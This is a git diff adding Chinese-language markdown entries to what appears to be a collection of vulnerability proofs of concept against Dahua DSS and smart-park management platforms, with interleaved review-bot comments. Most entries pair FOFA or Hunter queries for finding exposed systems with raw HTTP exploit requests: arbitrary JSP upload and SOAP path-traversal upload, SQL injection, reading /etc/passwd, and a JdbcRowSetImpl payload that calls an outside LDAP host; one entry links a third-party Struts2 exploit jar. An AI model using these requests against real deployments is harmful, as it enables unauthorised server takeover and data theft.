JSESSIONID=48C3365B18E192DAAB020C90A2BF0DEF +Upgrade-Insecure-Requests: 1 +``` + +![1707058843442-6c8106c8-b015-4036-9378-3693a95273aa.png](./img/dRGl6TsAKBTx2w2n/1707058843442-6c8106c8-b015-4036-9378-3693a95273aa-811566.png) + + + +> 更新: 2024-02-29 23:57:19 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gsq90pf8xgsyfgix> \ No newline at end of file diff --git a/大华DSS视频管理系统存在strust2命令执行漏洞.md b/大华DSS视频管理系统存在strust2命令执行漏洞.md new file mode 100644 index 0000000..7eb2354 --- /dev/null +++ b/大华DSS视频管理系统存在strust2命令执行漏洞.md 
@@ -0,0 +1,32 @@ +# 大华 DSS 视频管理系统 存在strust2命令执行漏洞 + +# 一、漏洞简介 +大大华 DSS 视频管理系统 存在strust2命令执行漏洞,攻击者通过漏洞获取服务器权限。 + +# 二、影响版本 ++ 大华 DSS 视频管理系统 + +# 三、资产测绘 ++ hunter:`app.name=="Dahua 大华 DSS 视频管理系统"` + +![1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc.png](./img/mc9SKA2jC6nV7nKC/1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc-976561.png) + ++ 登录页面 + +![1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590.png](./img/mc9SKA2jC6nV7nKC/1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590-628349.png) + +# 四、漏洞复现 +漏洞地址 + +```java +/portal/login_init.action +``` + +[Strruts2全版本漏洞测试工具17-6过WAF版.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222238928-6658bffd-c0ae-4391-a18e-74f0966c3be6.jar) + +![1701919580383-8d8fc9c5-c0a8-4d72-ae0b-8631dbf07114.png](./img/mc9SKA2jC6nV7nKC/1701919580383-8d8fc9c5-c0a8-4d72-ae0b-8631dbf07114-425195.png) + + + +> 更新: 2024-02-29 23:57:19 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mg5fcbpsfxg6xgzl> \ No newline at end of file diff --git a/大华智慧园区系统updateOcx_updateCab.action存在任意文件上传漏洞.md b/大华智慧园区系统updateOcx_updateCab.action存在任意文件上传漏洞.md new file mode 100644 index 0000000..a2b6f91 --- /dev/null +++ b/大华智慧园区系统updateOcx_updateCab.action存在任意文件上传漏洞.md 
@@ -0,0 +1,41 @@ +# 大华智慧园区系统updateOcx_updateCab.action存在任意文件上传漏洞 + +大华智慧园区系统updateOcx_updateCab.action存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +## fofa + +```javascript +app="dahua-智慧园区综合管理平台" +``` + +## poc + +```java +POST /portal/updateOcx_updateCab.action HTTP/1.1 +Host: xx.xx.xx.xx +Accept-Encoding: identity +Content-Length: 429 +Accept-Language: zh-CN,zh;q=0.8 +Accept: */* +User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info +Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3 +Connection: keep-alive +Referer: http://www.baidu.com +Cache-Control: max-age=0 +Content-Type: multipart/form-data; boundary=9b1d729ed9954863bcbedbb523cec7fa + +--9b1d729ed9954863bcbedbb523cec7fa +Content-Disposition: form-data; name="updateBean.loadCabFileName" + +sAuyJk.jsp +--9b1d729ed9954863bcbedbb523cec7fa +Content-Disposition: form-data; name="updateBean.loadCab"; filename="sAuyJk.jsp" +Content-Type: text/plain + +<% out.println(75471+90776+"tnMXedOsifiHeptP");new java.io.File(application.getRealPath(request.getServletPath())).delete();%> +--9b1d729ed9954863bcbedbb523cec7fa-- +``` + +文件地址 20240801102132 文件上传时间戳 + +`http://xx.xx.xx.xx/portal/ocx/20240801102132/sAuyJk.jsp` \ No newline at end of file diff --git a/大华智慧园区系统updateOcx_updateZip.action存在任意文件上传漏洞.md b/大华智慧园区系统updateOcx_updateZip.action存在任意文件上传漏洞.md new file mode 100644 index 0000000..b9f0e9e --- /dev/null +++ b/大华智慧园区系统updateOcx_updateZip.action存在任意文件上传漏洞.md 
@@ -0,0 +1,41 @@ +# 大华智慧园区系统updateOcx_updateZip.action存在任意文件上传漏洞 + +大华智慧园区系统updateOcx_updateZip.action存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +## fofa + +```javascript +app="dahua-智慧园区综合管理平台" +``` + +## poc + +```java +POST /portal/updateOcx_updateZip.action HTTP/1.1 +Host: xx.xx.xx.xx +Accept-Encoding: identity +Content-Length: 431 +Accept-Language: zh-CN,zh;q=0.8 +Accept: */* +User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info +Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3 +Connection: keep-alive +Referer: http://www.baidu.com +Cache-Control: max-age=0 +Content-Type: multipart/form-data; boundary=9aa1b50e33144fb18837cc97ed863df7 + +--9aa1b50e33144fb18837cc97ed863df7 +Content-Disposition: form-data; name="updateBean.compressFileName" + +KgJrYe.jsp +--9aa1b50e33144fb18837cc97ed863df7 +Content-Disposition: form-data; name="updateBean.compress"; filename="KgJrYe.jsp" +Content-Type: text/plain + +<% out.println(32461+18843+"eiaDXmEZEvlnjVVz");new java.io.File(application.getRealPath(request.getServletPath())).delete();%> +--9aa1b50e33144fb18837cc97ed863df7- +``` + +文件地址 20240801102132 文件上传时间戳 + +`http://xx.xx.xx.xx/portal/ocx/20240801102132/KgJrYe.jsp` \ No newline at end of file diff --git a/大华智慧园区综合管理平台 searchJson SQL注入漏洞.md b/大华智慧园区综合管理平台 searchJson SQL注入漏洞.md index 498e742..407855d 100644 --- a/大华智慧园区综合管理平台 searchJson SQL注入漏洞.md +++ b/大华智慧园区综合管理平台 searchJson SQL注入漏洞.md @@ -1,4 +1,13 @@ ## 大华智慧园区综合管理平台 searchJson SQL注入漏洞 + +## fofa + +```javascript +app="dahua-智慧园区综合管理平台" +``` + +## poc + ``` GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1 Host: 127.0.0.1:7443 diff --git a/大华智慧园区综合管理平台 文件上传漏洞.md b/大华智慧园区综合管理平台 文件上传漏洞.md index c9adbd6..f86a907 100644 --- a/大华智慧园区综合管理平台 文件上传漏洞.md +++ b/大华智慧园区综合管理平台 文件上传漏洞.md 
@@ -1,4 +1,13 @@ ## 大华智慧园区综合管理平台 文件上传漏洞 + +## fofa + +```javascript +app="dahua-智慧园区综合管理平台" +``` + +## poc + ``` POST /publishing/publishing/material/file/video HTTP/1.1 Host: 127.0.0.1:7443 diff --git a/大华智慧园区综合管理平台-deleteFtp-远程命令执行漏洞.md b/大华智慧园区综合管理平台-deleteFtp-远程命令执行漏洞.md new file mode 100644 index 0000000..e67f202 --- /dev/null +++ b/大华智慧园区综合管理平台-deleteFtp-远程命令执行漏洞.md @@ -0,0 +1,23 @@ +## 大华智慧园区综合管理平台 deleteFtp 远程命令执行漏洞 + +## fofa +``` +body="src=/WPMS/asset/common/js/jsencrypt.min.js" +``` + +## poc +``` +POST /CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1 +Host: Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9Cookie: yourCookieConnection: close +Content-Type: application/json +Content-Length: 189 + +{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://x.x.x.x","autoCommit":true}}} +``` + +`ldap://x.x.x.x` 填入dnslog地址 ,发送poc dnslog有请求说明存在漏洞 diff --git a/大华智慧园区综合管理平台-searchJson-SQL注入漏洞.md b/大华智慧园区综合管理平台-searchJson-SQL注入漏洞.md new file mode 100644 index 0000000..498e742 --- /dev/null +++ b/大华智慧园区综合管理平台-searchJson-SQL注入漏洞.md @@ -0,0 +1,8 @@ +## 大华智慧园区综合管理平台 searchJson SQL注入漏洞 +``` +GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1 +Host: 127.0.0.1:7443 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Accept-Encoding: gzip, deflate +Connection: close +``` 
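Review bot: The POST request in 夜莺开源监控系统存在默认用户漏洞.md declares `Content-Length: 61`, but the body `{"Username":"test","Password":"test","Roles":["Admin"]}` is 55 bytes, so a server reading the declared length will hang or reject the request; drop the header and let the client compute it. The first fence is tagged `javascript` and the second has no tag; both should be `http`. The entry's own point is a default account, so the GET to `/v1/n9e/users` already confirms it; the second request creates an `Admin` user on the target, which changes its state and belongs in a separate, clearly labelled impact section at most. The summary "/v1/n9e/接口401鉴权存在默认用户" should name the default account and the remediation (remove or re-credential it) rather than leaving it implicit in a base64 header.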
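Review bot: The 大为…任意密码重置 entry is not reproducible as written: the only PoC is `/resetPwd.html?guid=IWBI9Hve…` with an opaque, target-specific token, and nothing says how that `guid` is obtained or why any user can reset any account with it. A sentence on the mechanism (is the token predictable, reusable, or not bound to the user?) is needed both for the title's "任意" claim and for a defender to know what to fix; the 漏洞简介 currently just repeats the title.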
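Review bot: 大华DSS-itcBulletin-SQL-注入漏洞.md and 大华DSS视频管理系统deleteBulletin存在SQL注入漏洞.md describe the same injection point (`deleteBulletin`/`netMarkings` on `/portal/services/itcBulletin`); keep one. In this file, the first raw request hard-codes `Content-Length: 345` for a body of a different size, the second request pulls `login_name`/`login_pass` from `sys_user`, which goes well beyond what is needed to confirm the flaw (the `md5()` probe already does that), and the nuclei template uses the legacy `requests:` key where current templates use `http:`. The template's matcher is otherwise sound (status 500, error code 1105, and the expected md5 substring all required).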
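Review bot: In 大华DSS数字监控系统attachment_downloadAtt.action任意文件读取漏洞.md the description names `attachment_downloadByUrlAtt.action` while the title and the PoC use `attachment_downloadAtt.action`; these are two different actions (the ByUrl variant has its own entry in this commit), so the text should match the request. The FOFA fence is tagged `java`; use `plain`.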
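Review bot: The 漏洞简介 of attachment_clearTempFile存在SQL注入漏洞.md is wrapped in `<font style="color:rgb(0, 0, 0);">…</font>`, leftover inline styling from the export; remove the tag so the markdown stays plain. The request fence is tagged `java` for an HTTP request. The PoC's `EXTRACTVALUE(...md5(1)...)` probe is fine as a confirmation, but the file should say what substring in the response indicates success, as the getAttList entry does with its `qkkkq1qxxbq` marker.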
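Review bot: The GET request in attachment_getAttList存在SQL注入漏洞.md carries `Content-Length: 345` with no body; a compliant server will wait for 345 bytes that never arrive, so the request as written times out. Remove the header. The bare ```` ```java qkkkq1qxxbq ``` ```` block needs a lead-in sentence stating that this is the marker expected in the response; on its own it reads as a stray literal. The `java` fence tags belong on none of these blocks.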
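Review bot: Both requests in deleteBulletin存在SQL注入漏洞.md include `Cookie: JSESSIONID=0F29FE…; JSESSIONID=D08F47…`, two values for the same cookie name copied from a recorded browser session, and fixed `Content-Length` values (436, 346); strip the cookies and let the client set the length, otherwise the PoC only works by coincidence. The `<!--type: string-->` comment and `SOAPAction:` with an empty value are harmless but add noise. As noted on the itcBulletin file, this duplicates that entry.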
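Review bot: user_edit存在密码泄漏漏洞.md has a typo in the description ("监挂控" for "监控") and again carries two `JSESSIONID` cookies from a recorded session. More importantly, the text never says what `user_edit.action?id=1` returns; "密码泄漏" should be backed by a sentence naming the field that exposes the credential (plaintext, hash, or reversible form), since that determines the severity and the fix.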
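Review bot: The file name and title 大华DSS视频管理系统存在strust2命令执行漏洞.md misspell "struts2" as "strust2", and the summary starts with "大大华". Fix both before the name is referenced elsewhere. The reproduction section links a third-party .jar scanner hosted on yuque instead of identifying the Struts2 advisory that `/portal/login_init.action` is vulnerable to; an advisory id gives defenders the patch level, whereas an unsigned binary download gives them a supply-chain risk.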
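Review bot: The multipart body in updateOcx_updateZip.action存在任意文件上传漏洞.md ends with `--9aa1b50e33144fb18837cc97ed863df7-`, a single trailing dash; the closing delimiter must end in `--`, so the request as pasted is truncated. Both the updateCab and updateZip entries hard-code `Content-Length` (429, 431) and carry a stray ` info` token at the end of the `User-Agent` value. The line "文件地址 20240801102132 文件上传时间戳" should state that the directory name is the server-side upload timestamp and where it is reported (response body or header), since a reader cannot know the path without that.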
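Review bot: The commit both edits "大华智慧园区综合管理平台 searchJson SQL注入漏洞.md" (index 498e742 → 407855d) and adds "大华智慧园区综合管理平台-searchJson-SQL注入漏洞.md" with index 0000000..498e742, i.e. the new hyphenated file is byte-for-byte the pre-edit version of the spaced one; the same happens for "… 文件上传漏洞.md" (c9adbd6 → f86a907) and its hyphenated copy (0000000..c9adbd6). This looks like a rename that was applied as a copy. Keep one name per entry, and if the hyphenated form is the intended one, move the new fofa/poc headings there.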
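Review bot: The request in deleteFtp-远程命令执行漏洞.md has headers run together on single lines: `Host: Cache-Control: max-age=0` and `Accept-Language: zh-CN,zh;q=0.9Cookie: yourCookieConnection: close`; the Host value would be sent as "Cache-Control: max-age=0" and three headers are fused into one, so the PoC cannot work as pasted. Split them onto their own lines and leave `Host:` empty like the other entries. The JSON body (`"@type":"com.sun.rowset.JdbcRowSetImpl"` with a `dataSourceName` URL) is a JSON autoType deserialization gadget, so the description should name the deserialization component and its fixed version; that, not the DNS-log check, is what lets an operator verify whether a deployment is patched.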
diff --git a/大华智慧园区综合管理平台-文件上传漏洞.md b/大华智慧园区综合管理平台-文件上传漏洞.md new file mode 100644 index 0000000..c9adbd6 --- /dev/null +++ b/大华智慧园区综合管理平台-文件上传漏洞.md @@ -0,0 +1,24 @@ +## 大华智慧园区综合管理平台 文件上传漏洞 +``` +POST /publishing/publishing/material/file/video HTTP/1.1 +Host: 127.0.0.1:7443 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Length: 804 +Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7 +Accept-Encoding: gzip, deflate +Connection: close + +--dd8f988919484abab3816881c55272a7 +Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp" + +<%@page contentType="text/html; charset=GBK"%><%@page import="java.math.BigInteger"%><%@page import="java.security.MessageDigest"%><% MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";String miyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);new java.io.File(application.getRealPath(request.getServletPath())).delete();%> +--dd8f988919484abab3816881c55272a7 +Content-Disposition: form-data; name="poc" + +poc +--dd8f988919484abab3816881c55272a7 +Content-Disposition: form-data; name="Submit" + +submit +--dd8f988919484abab3816881c55272a7-- +``` diff --git a/大华智慧园区综合管理平台attachment_downloadAtt.action任意文件读取.md b/大华智慧园区综合管理平台attachment_downloadAtt.action任意文件读取.md new file mode 100644 index 0000000..45bc759 --- /dev/null +++ b/大华智慧园区综合管理平台attachment_downloadAtt.action任意文件读取.md 
@@ -0,0 +1,34 @@ +# 大华智慧园区综合管理平台attachment_downloadAtt.action 任意文件读取 + +# 一、漏洞简介 +大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台attachment_downloadAtt.action 存在任意文件读取漏洞 + +# 二、影响版本 ++ 大华智慧园区综合管理平台 + +# 三、资产测绘 ++ hunter:`app.name="Dahua 大华 智慧园区管理平台"` +![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/jaCC7DXDDmfvY9yI/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-356915.png) ++ 登录页面: + +![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/jaCC7DXDDmfvY9yI/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-333076.png) + +# 四、漏洞复现 +```plain +GET /portal/attachment_downloadAtt.action?filePath=/etc/passwd HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=ABB59960633C3E7734D10072A90C5E31; JSESSIONID=4405A0D40C98D16E75E036C95FB89669 +Upgrade-Insecure-Requests: 1 +``` + +![1699421293209-2b66f6f8-c519-4d64-b573-e1d6f956d566.png](./img/jaCC7DXDDmfvY9yI/1699421293209-2b66f6f8-c519-4d64-b573-e1d6f956d566-646472.png) + + + +> 更新: 2024-02-29 23:57:18 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yxprolu54446xcih> \ No newline at end of file diff --git a/大华智慧园区综合管理平台attachment_downloadByUrlAtt.action任意文件读取.md b/大华智慧园区综合管理平台attachment_downloadByUrlAtt.action任意文件读取.md new file mode 100644 index 0000000..6bb850a --- /dev/null +++ b/大华智慧园区综合管理平台attachment_downloadByUrlAtt.action任意文件读取.md 
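Review bot: the `Cookie` line in the 四、漏洞复现 request carries two captured `JSESSIONID` values (`ABB5996...` and `4405A0D...`); session identifiers copied from a test instance should be replaced with a placeholder, both because they are not part of the finding and because leaving them in leaks state of the system the request was captured from. It would also help to state in text whether the request works without a session, since the summary calls this 任意文件读取 but the evidence is a single screenshot. The 二、影响版本 section only restates the product name; without a version or build number it is not actionable for patch management, and the record gives no vendor reference or fix.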
@@ -0,0 +1,39 @@ +# 大华智慧园区综合管理平台attachment_downloadByUrlAtt.action 任意文件读取 + +# 一、漏洞简介 +大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台attachment_downloadByUrlAtt.action 存在任意文件读取漏洞 + +# 二、影响版本 ++ 大华智慧园区综合管理平台 + +# 三、资产测绘 ++ hunter:`app.name="Dahua 大华 智慧园区管理平台"` +![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/OVodldMk_3aAoGNG/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-503279.png) ++ 登录页面: + +![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/OVodldMk_3aAoGNG/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-932812.png) + +# 四、漏洞复现 +```plain +GET /portal/itc/attachment_downloadByUrlAtt.action?filePath=file:/ HTTP/1.1 +Host: xx.xx.xx.xx +Cookie: JSESSIONID=E6205C47507484A3593288B704F31990 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1699360291610-53699093-c625-42fd-a637-afc57fe2571e.png](./img/OVodldMk_3aAoGNG/1699360291610-53699093-c625-42fd-a637-afc57fe2571e-251069.png) + + + +> 更新: 2024-02-29 23:57:18 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lowupyok2gqtndzo> \ No newline at end of file diff --git a/大华智慧园区综合管理平台bitmap任意文件上传漏洞.md b/大华智慧园区综合管理平台bitmap任意文件上传漏洞.md new file mode 100644 index 0000000..6591aa0 --- /dev/null +++ b/大华智慧园区综合管理平台bitmap任意文件上传漏洞.md 
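Review bot: same session-identifier problem as the previous record: the `Cookie: JSESSIONID=E6205C4...` value is a captured token and should be a placeholder. The request itself (`filePath=file:/` against attachment_downloadByUrlAtt.action) is the record's most useful detail for defenders and deserves a sentence in the text: a download action that accepts a `file:` scheme in a parameter meant for a URL is both the root cause and an easy log signature (`filePath=file:` on this action), and the mitigation is to reject non-HTTP schemes and serve only files from an allowlisted directory. The summary paragraph currently just repeats the title.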
@@ -0,0 +1,65 @@ +# 大华智慧园区综合管理平台bitmap任意文件上传漏洞 + +# 一、漏洞描述 +大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。 <font style="color:rgba(0, 0, 0, 0.9);">大华智慧园区综合管理平台在/emap/webservice/gis/soap/bitmap接口处存在任意文件上传漏洞,可以利用此漏洞获得webshell。</font> + +# 二、影响版本 ++ 大华智慧园区综合管理平台 + +# 三、资产测绘 ++ hunter:`app.name="Dahua 大华 智慧园区管理平台"` +![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/HG23J_nyhrdo58lW/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-560053.png) ++ 登录页面: + +![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/HG23J_nyhrdo58lW/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-864747.png) + +# 四、漏洞复现 +```plain +POST /emap/webservice/gis/soap/bitmap HTTP/1.1 +Cookie: JSESSIONID=C30EF0C843ACBDC71597DEE0CBDADE8C +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +SOAPAction: +Content-Type: text/xml;charset=UTF-8 +Host: +Content-Length: 628 + +<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:res="http://response.webservice.bitmap.mapbiz.emap.dahuatech.com/"> + <soapenv:Header/> + <soapenv:Body> + <res:uploadPicFile> + <arg0> + <picName>stc.jsp</picName> + <!--type: string--> + <picPath>/../stc.jsp</picPath> + </arg0> + <!--type: base64Binary--> + <arg1>PCVvdXQucHJpbnQoOTk5Kjk5OSk7bmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTslPg==</arg1> + </res:uploadPicFile> + </soapenv:Body> +</soapenv:Envelope> +``` + 
+![1705066652548-ea581a8b-7dda-47d8-ba5c-4146ca15a392.png](./img/HG23J_nyhrdo58lW/1705066652548-ea581a8b-7dda-47d8-ba5c-4146ca15a392-879908.png) + +上传文件位置 + +```plain +/upload/stc.jsp +``` + +![1705066683323-27e6d62e-6195-4d8c-a4ed-f17ec4a35ab1.png](./img/HG23J_nyhrdo58lW/1705066683323-27e6d62e-6195-4d8c-a4ed-f17ec4a35ab1-230024.png) + + + +> 更新: 2024-02-29 23:57:19 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ygkzgd2uu9gcxavq> \ No newline at end of file diff --git a/大华智慧园区综合管理平台deleteBulletinSQL注入漏洞.md b/大华智慧园区综合管理平台deleteBulletinSQL注入漏洞.md new file mode 100644 index 0000000..05a9512 --- /dev/null +++ b/大华智慧园区综合管理平台deleteBulletinSQL注入漏洞.md 
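Review bot: in the bitmap record the `<arg1>` value is left as an opaque base64 blob; the text should say what it decodes to (a JSP that prints `999*999` and then deletes itself via `application.getRealPath(request.getServletPath())`), so a reviewer can see that the verification leaves nothing behind, and it should name the actual defect, which is the `picPath` value `/../stc.jsp` escaping the upload directory to the `/upload/stc.jsp` location given at the end. The request block also has empty `Host:` and `SOAPAction:` headers that should be marked as placeholders, and the `Cookie: JSESSIONID=C30EF0C8...` value is a captured token. The `<font style="color:rgba(0, 0, 0, 0.9);">` wrapper in 一、漏洞描述 is export residue from the source platform and should be dropped from the markdown.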
@@ -0,0 +1,49 @@ +# 大华智慧园区综合管理平台deleteBulletin SQL注入漏洞 + +# 一、漏洞简介 + “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区综合管理平台未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。 + +# 二、影响版本 ++ 大华智慧园区综合管理平台 + +# 三、资产测绘 ++ hunter:`app.name="Dahua 大华 智慧园区管理平台"` + +![1691829123219-724bd409-5d1c-4593-88e9-2990fef366ad.png](./img/B0-EQlrucjZkjtaZ/1691829123219-724bd409-5d1c-4593-88e9-2990fef366ad-456762.png) + ++ 登录页面: + +![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/B0-EQlrucjZkjtaZ/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-634247.png) + +# 四、漏洞复现 +```plain +POST /portal/services/itcBulletin HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +SOAPAction: +Content-Type: text/xml;charset=UTF-8 +Host: {hostname} +Content-Length: 442 + +<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:itc="http://itcbulletinservice.webservice.dssc.dahua.com"> + <soapenv:Header/> + <soapenv:Body> + <itc:deleteBulletin> + <!--type: string--> + <netMarkings>(UPDATEXML(2326, + CONCAT(0x2e,0x71706a7171,(select 111*111),0x71706a7171),4027)))AND (2373=2373</netMarkings> + </itc:deleteBulletin> + </soapenv:Body> +</soapenv:Envelope> +``` + +![1702741800989-1457b1a9-1b82-4fc0-8a06-ca9921345835.png](./img/B0-EQlrucjZkjtaZ/1702741800989-1457b1a9-1b82-4fc0-8a06-ca9921345835-626897.png) + + + +> 更新: 2024-02-29 23:57:18 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/in7vnveyi5bug7u3> \ No newline at end of file diff --git a/大华智慧园区综合管理平台deleteFtp接口远程命令执行.md b/大华智慧园区综合管理平台deleteFtp接口远程命令执行.md new file mode 100644 index 0000000..3d1cdad --- /dev/null 
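Review bot: the 一、漏洞简介 text is generic boilerplate (未对用户的输入进行有效的过滤) that never names the affected operation or parameter; it should state that the injection point is the `netMarkings` element of the `deleteBulletin` SOAP operation on /portal/services/itcBulletin, since that is what a defender has to filter or monitor. The record also gives no success criterion in text: the screenshot is the only evidence, so say what the response must contain for the check to count (the `select 111*111` result wrapped in the `0x71706a7171` markers). The request carries no session cookie, which supports the 未授权 claim in the summary, but that should be stated explicitly rather than left to inference.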
+++ b/大华智慧园区综合管理平台deleteFtp接口远程命令执行.md @@ -0,0 +1,38 @@ +# 大华智慧园区综合管理平台deleteFtp 接口远程命令执行 + +# 一、漏洞简介 +大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台deleteFtp 接口远程命令执行,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 大华智慧园区综合管理平台 + +# 三、资产测绘 ++ hunter:`app.name="Dahua 大华 智慧园区管理平台"` +![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/pOtHG7nJ8gFl98LB/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-790928.png) ++ 登录页面: + +![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/pOtHG7nJ8gFl98LB/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-069976.png) + +# 四、漏洞复现 +<font style="color:rgb(51, 51, 51);">deleteFtp接口存在命令执行漏洞,可执行LDAP解析等。</font> + +```plain +POST /CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 +Connection: close +Content-Length: 243 +Content-Type: application/json 